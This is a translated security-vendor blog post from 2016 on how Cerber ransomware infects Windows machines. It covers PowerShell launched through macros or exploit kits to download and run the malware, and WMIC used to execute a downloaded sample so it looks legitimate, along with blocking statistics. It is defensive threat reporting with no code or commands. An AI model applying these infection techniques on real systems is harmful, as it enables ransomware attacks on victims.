August 3, 2016 at 14:24

Tales of Ransomwhere: Cerber on the rise

Original author: Panda Security
  • Transfer


Cerber is a relatively new cryptographic family that has been hit hard in the past few months. In this article, we want to take a look at some of the techniques that are used to infect their victims.

Chapter 2: Cerber


In my first article in this series, I talked about using the Windows utility known as PowerShell to infect computers with an encryptor. This can be done in various ways, but PowerShell was called for a reason: it is really powerful! One of the easiest ways to use it is to download the file (malicious!) And run it. Of course, before you do this, you must run PowerShell, which can be done using some kind of script, a macro inside Office documents, or as a “payload” for some exploits. In the case of Cerber, exploit kits are typically used.

Thanks to all the information we have, you can easily filter this kind of data. Over the past 3 months, more than 3,000 infection attempts were blocked that PowerShell used to download and download malware (ransomware):



After a quick run, I want to say that it is Cerber, although there may be different families of ransomware (since we block all infections , we don’t need to check every binary code unless it is required for research purposes). Most of these attacks occurred in the first weeks of July. If we go back to October last year, we can see that in fact this is the biggest wave of infections using this technique in the last 10 months:



Several hashes were accidentally selected among the many thousands of hashes that we block if you want to "play" with them in your laboratory and protect your users:

Encryption_list

Another quite relevant way these days is to run a malicious program to infect victims using Cerber - through WMIC, the command-line version of Windows Management Instrumentation (WMI). So far, all the cases that we have observed have occurred through exploits on computers with Internet Explorer. The malware sample is downloaded to the computer, and instead of executing it immediately, it uses WMIC to execute it (thus, an attempt is made to give a legal character to the behavior, since WMIC is a non-malicious program that belongs to the Windows operating system). Over the past 4 weeks, we have blocked more than 3,000 infection attempts using a similar “trick”:



Here's another selection of some crypto hashes that use this technique with WMIC that we stopped for 3 days:
crypto_list_2

Stay with us until the next chapter of Ransomwhere Tales.

Article Author: Louis Corrons
Tags:

Also popular now: